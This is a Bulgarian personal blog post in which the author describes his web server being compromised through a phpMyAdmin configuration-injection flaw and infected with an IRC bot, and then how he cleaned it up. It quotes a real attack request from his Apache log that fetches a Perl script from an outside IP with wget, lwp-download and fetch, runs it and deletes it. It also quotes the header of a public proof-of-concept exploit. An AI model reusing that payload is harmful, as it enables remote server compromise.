Искам да се оплача … от собствената си глупост … и то много да се оплача …
То бива бива да съм заблуден, ама като мене не бива. Ситуацията на кратко – сървъра ми беше хакнат! Дап, моето мило Анаваро!
Беше заразен с IRC бот вирус. Нямаше много „мрежеви“ поражения … защото машината слаба или аз съм я сложил калпаво, та вируса само се изпълняваше, вдигаше CPU-то на 100% и системата умираше – няма мрежа, няма нищо, а аз знаете съм на 500 км.
След няколко рестарт-а и любимите ми „tail -f“ и „htop“ успях да засека следния малък проблем:
ID USER NI CPU% MEM% VIRT SHR S TIME+ Command 3813 apache 0 65.0 0.1 1776 432 R 1:42.64 ./std 89.137.139.225 0
А … ново 20??? Какъв пък процес се изпълнява от apache (Web Server-a) …
Спомних си кога за първи път се появи проблема и се зарових из логовете на индианеца … където открих следния „смахнат“ ред:
88.191.14.38 - - [29/Nov/2009:02:12:10 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20http://88.170.72.136/gcc.txt;lwp-download%20http://88.170.72.136/gcc.txt;fetch%20http://88.170.72.136/gcc.txt;perl%20gcc.txt;rm%20-fr%20gcc.txt HTTP/1.1" 200 181
Изненадкааа …Разбира се разпищях се из Linux-bg и ми върнаха лошата за мен новина:
# PoC script successfully tested on the following targets: # phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1 # Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2) # attack requirements: # 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5 # and 3.x before 3.1.3.1 according to PMASA-2009-3 # 2) it *seems* this vuln can only be exploited against environments # where the administrator has chosen to install phpMyAdmin following # the *wizard* method, rather than manual method: http://snipurl.com/jhjxx # 3) administrator must have NOT deleted the ‘/config/’ directory
# within the ‘/phpMyAdmin/’ directory. this is because this directory is
# where ‘/scripts/setup.php’ tries to create ‘config.inc.php’ which is where
# our evil PHP code is injected
Бах! Как се саморазпосувах, само може да си представите! Правих какви ли не магарии – то не бяха преинсталации на apache, промени на пътеки …
Отново и отново ./std $IP $PORT процеса ме убиваше …
Питайки чичко Гугъл … случайно стигнах до един сайт в който някой се оплакваше от моя проблем.
ps aux | grep apache
ми даде виновника – индианеца се беше троянизирал … изпълняваше процеси (добре че е deamon) …
crontab -u apache -e
ми даде и проблема – някакво фаилче кръстено y2kupdate в /tmp/.pid/ и изпълнимо … на бързо му бих „rm -r“, премахнах референцията в cron-а и изтрих phpMyAdmin-a (сложих си го на скрито място) …
Знам, че съм пълен идиот … ама аз съм си такъв …
Ваш,
Lucifer
Нещо ново от мен: Hacked … – http://www.anavaro.com/blog/hacked/ (Geek Time)